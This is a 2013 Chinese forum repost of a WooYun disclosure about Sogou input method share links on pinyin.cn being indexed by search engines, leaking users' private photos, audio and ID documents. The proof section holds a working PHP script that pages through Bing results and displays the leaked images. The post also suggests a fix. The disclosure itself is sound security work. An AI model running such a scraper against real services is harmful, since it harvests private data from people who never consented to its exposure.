搜狗输入法泄密事件,导致大量用户敏感信息泄露 |
|
本帖最后由 coldsea 于 2013-6-5 19:07 编辑
http://www.wooyun.org/bugs/wooyun-2013-023081 这是原帖,镇长@乌云 下午发现微博疯传搜狗输入法泄密事件,网友们已经挖出了大量敏感 & 成年内容! 其实该漏洞乌云很久之前就接到了白帽子的报告,并且及时通知了厂商,但问题至今未得到有效的处理。搜狗输入法可导致大量用户敏感信息泄露         甚至还有部分 成年 音频流出  漏洞证明: 为了验证方便,写了一段代码这个是针对bing的结果弄的。 set_time_limit(0); $url = 'http://cn.bing.com/search?q=site%3apinyin.cn&qs=n&pq=site%3apinyin.cn&sc=0-4&sp=-1&sk=&first={ddddd}1&FORM=PERE'; $i = $_GET['i']; $api = file_get_contents(str_replace('{ddddd}',$i,$url)); preg_match_all('/<a href=\"http:\/\/pinyin.cn\/([a-zA-Z0-9]+)?\"/',$api,$a); foreach($a[1] as $v) { $api = file_get_contents('http://pinyin.cn/'.$v); preg_match('/<a target="_blank" href="(.*?)">/',$api,$aa); if($aa) { echo '<br>'; echo '<a target="_blank" href="http://pinyin.cn/'.$v.'">http://pinyin.cn/'.$v.'</a>:'; echo '<img class=\'round_img\' id=\'round_img\' src="'.$aa[1].'" border=0 max-width="210px" max-height="210px" />'; } } 修复方案: 短信发送时可以带一组查看码(如4位字符),打开链接时输入查看码才能查看内容。 漏洞详情披露状态: 2013-05-04: 细节已通知厂商并且等待厂商处理中 搜狗输入法信息发送过程存储了相对应的信息在云端,但由于相应配置及其他原因造成会话信息【图片、视频、音频】泄露。其中很多身份证、果照、还有检举信!!! 详细说明:搜狗输入法信息发送过程存储了相对应的信息,由于不严谨造成信息被搜索引擎抓取。 |
 |
Geass-CC 发表于 2013-6-5 18:38 {:7_857:}哈哈,你是不是也输入了照片啥的 |
|
|
phoenixx 发表于 2013-6-5 18:48 come on 除非五笔输入法,拼音输入法联网绝对效率要高一大捷 |
|
|
|
|
|
|
0west0 发表于 2013-6-5 19:20 我看不懂啊 |
|
再来射一次
 |
0west0 发表于 2013-6-5 19:20 说什么啊 |
|
再来射一次
|
9月21更新DSM7.2.2AME完美解码!解决Survei28046 人气#黑白群晖
最新版Surveillance Station 9.2.0-11289支12660 人气#黑白群晖
丢掉OPENWRT旁网关。ESXi下实现iKuai+OP双7234 人气#黑白群晖
求任意大站邀,馒头,空,猫等均可,NAS 240 人气#PTer求邀
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
